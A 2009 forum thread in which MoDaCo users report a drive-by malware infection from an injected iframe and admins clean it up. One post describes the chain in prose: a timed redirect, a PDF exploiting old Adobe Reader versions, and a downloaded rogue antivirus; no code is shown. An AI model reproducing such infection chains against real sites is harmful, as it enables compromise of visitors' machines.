Jump to content


Photo

Adware / spyware in modaco adds?

- - - - -

  • Please log in to reply
12 replies to this topic

#1
Mysterious Stranger

Mysterious Stranger

    Addict

  • Members
  • PipPipPipPipPip
  • 776 posts
  • Devices:Acer dual sim thingy..
See screendump. Wasn't log'd in at the time. Syntax struck me as odd. Upon clicking 'no' it tried downloading anyway but my firewall stopped it....

IE6, fully patched, doing a full scan just in case :-(

Nowhere's safe on the t'interweb eh?

M.S

Attached Files


  • 0

#2
Mysterious Stranger

Mysterious Stranger

    Addict

  • Members
  • PipPipPipPipPip
  • 776 posts
  • Devices:Acer dual sim thingy..
More info:

The setTimeout function tells the browser to run the function ‘vparivatel’ in 60 seconds. This function will then redirect the browser to the page vparivatel.php on the same website. This then asks the user to download the file 1.exe.

This adds an element to the current page containing a pdf object. The pdf file that is loaded by this object attempts to exploit a vulnerability in Adobe Acrobat and Acrobat reader. This vulnerability affects versions prior to 8.1.2. If the exploit is successful it will download and execute the 1.exe file without requiring any interaction from the user.

The 1.exe file downloads and installs the rouge antivirus program Spyware Guard 2008. This program pretends to scan the system and falsely reports that the system is infected. In order to remove these ‘threats’ the users must pay for the full version. One clue for the user that this is not legitimate security software is the misspelling of 'security' in the tab on the left hand side.

  • 0

#3
TheDrizzle

TheDrizzle

    Enthusiast

  • Members
  • PipPipPip
  • 235 posts
Yea my AVG is going nuts each time I visit the forum. It is saying "Exploit Link to known exploit site (type 502)" each time I view any MoDaCo page.... is this a false positive or is there something here?

EDIT:
Just saw your second post. I did notice it asked me download a PDF! Luckily I use FoxIt not Adobe Reader so hopefully I'm ok.

Gonna do a MalwareBytes scan just in case.

Thanks!

Edited by TheDrizzle, 21 February 2009 - 11:32 PM.

  • 0

#4
PaulOBrien

PaulOBrien

    It's My Party

  • Founder
  • PipPipPipPipPipPip
  • 36,345 posts
  • Gender:Male
  • Location:Norwich, UK
  • Devices:All the Nexus!
  • Twitter:@paulobrien
Investigating...

P

  • 0

You can follow me on Twitter - http://twitter.com/paulobrien / Follow MoDaCo on Twitter - http://twitter.com/modaco

Want to donate? MoDaCo is raising money for the Multiple Sclerosis society.

Posted Image


#5
PaulOBrien

PaulOBrien

    It's My Party

  • Founder
  • PipPipPipPipPipPip
  • 36,345 posts
  • Gender:Male
  • Location:Norwich, UK
  • Devices:All the Nexus!
  • Twitter:@paulobrien
Should be gone now, continuing diagnosis...

P

  • 0

You can follow me on Twitter - http://twitter.com/paulobrien / Follow MoDaCo on Twitter - http://twitter.com/modaco

Want to donate? MoDaCo is raising money for the Multiple Sclerosis society.

Posted Image


#6
awarner

awarner

    Staff Team Leader

  • Admin Team
  • PipPipPipPipPipPip
  • 18,506 posts
  • Gender:Male
  • Location:Southampton
  • Interests:Life the universe and everything in it :)

    Lumia 925 one hell of a camera phone
  • Devices:Lumia 925 a real phone at last
  • Twitter:@ashwarner
On the lappy Kaspersky found it as soon as I clicked on the site :(

Windows Onecare did not even flinch and let the little beatie screw up my main PC.

  • 0
Twitter me @ashwarner

Windows Phone 7 Expert.
Windows Phone Business Specialist



#7
Mysterious Stranger

Mysterious Stranger

    Addict

  • Members
  • PipPipPipPipPip
  • 776 posts
  • Devices:Acer dual sim thingy..

Windows Onecare did not even flinch and let the little beatie screw up my main PC.


Should only be an issue if you allow the re-direct and file install by clicking on it, although *any* action in the dialogue box ( even clicking 'no') prompts for the download. I'd suggest you reset your browser security settings to default? My laptop has a corporate norton on there but I use onecare on other machine and it's usually very good.

M.S

  • 0

#8
awarner

awarner

    Staff Team Leader

  • Admin Team
  • PipPipPipPipPipPip
  • 18,506 posts
  • Gender:Male
  • Location:Southampton
  • Interests:Life the universe and everything in it :)

    Lumia 925 one hell of a camera phone
  • Devices:Lumia 925 a real phone at last
  • Twitter:@ashwarner
Did not get that far, the whole hard drive went in to overtime and the pc went as fast as an Orange ROM :(

Using FF and all security settings will be the default as I generally do not touch them, the same applies to Onecare.
I've found Onecare to be good in the past but then again after this just how good has it really been?
Some guys I know in the security business will only touch Kaspersky but as they say most threats will technically get though until someone reports them.

Now the pc seems to hang on a virus check, third time lucky...

  • 0
Twitter me @ashwarner

Windows Phone 7 Expert.
Windows Phone Business Specialist



#9
Mysterious Stranger

Mysterious Stranger

    Addict

  • Members
  • PipPipPipPipPip
  • 776 posts
  • Devices:Acer dual sim thingy..

Did not get that far, the whole hard drive went in to overtime and the pc went as fast as an Orange ROM :(

Using FF and all security settings will be the default as I generally do not touch them, the same applies to Onecare.
I've found Onecare to be good in the past but then again after this just how good has it really been?
Some guys I know in the security business will only touch Kaspersky but as they say most threats will technically get though until someone reports them.

Now the pc seems to hang on a virus check, third time lucky...


Check the pop up blocker settings in firefox.

http://support.mozil.../Pop-up blocker

There are options to handle different file types differently. As this exploit uses a .pdf file it may be you have settings that allow downloads of pdfs ( which are usually safe and inert....)

Also from older posts on t'interweb (June 08) firefox automatically downloads stuff into a cache:

http://alanedwardes....-security-flaw/

"WTF? So does Firefox download stuff for you now? So it turns out it does. When I looked in the OneCare quarantine it displayed the path that the virus was found in. So, I was a bit worried when it turned out that the file was found in the Firefox cache folder. Interesting."

Which version firefox is it? There are/were multiple mutterings about incompatability with onecare for older versions. As onecare has now been discontinued (as some aspects are going to be incorporated in future free offerings from M$) I wouldn't expect too much development with the latest version of firefox etc. Shame as some of the advanced functions with onecare are very good.

I've always given Kaspersky a bit of a wide berth based on F-secure using their engine and being so poor at doing pretty much anything. Everyone has their own favourite and there will be fans and haters of every solution. Norton's 2009 suite has been re-written to improve system performance and is supposedly quite good now.

Kaspersky also uninstalls the very good, free, spybot s&d for no real reason...

http://forum.kaspers...mp;#entry768506

M.S

  • 0

#10
Mysterious Stranger

Mysterious Stranger

    Addict

  • Members
  • PipPipPipPipPip
  • 776 posts
  • Devices:Acer dual sim thingy..

Should be gone now, continuing diagnosis...

P


Still doing it - look at the URL it's trying to open, same as the last one, crashed my browser window this time though. :(

More diagnosis needed methinks?

M.S

Attached Files


  • 0

#11
Monolithix

Monolithix

    Hardcore

  • MoDaCo Gold
  • PipPipPipPipPipPip
  • 8,783 posts
OK, looks like the owner of caribfinancing has found out about their security issue and is now redirecting calls to that page to google....which means due to the iframe remaining on every page footer every modaco page is being redirected to google! (unless you hit stop in time...).

Virus issue appears to have been resolved but obviously the site just needs tweaking back, watch this space...

  • 0

I still exist


#12
PaulOBrien

PaulOBrien

    It's My Party

  • Founder
  • PipPipPipPipPipPip
  • 36,345 posts
  • Gender:Male
  • Location:Norwich, UK
  • Devices:All the Nexus!
  • Twitter:@paulobrien
Should be all sorted now, nasty hackers... :(

P

  • 0

You can follow me on Twitter - http://twitter.com/paulobrien / Follow MoDaCo on Twitter - http://twitter.com/modaco

Want to donate? MoDaCo is raising money for the Multiple Sclerosis society.

Posted Image


#13
markmcfc

markmcfc

    Newbie

  • Members
  • Pip
  • 1 posts
hi there i have this same problem on my site, ive deleted it many times from skins but it keeps coming back, please can you tell me how to get rid of it altogether

many thanks

  • 0




0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users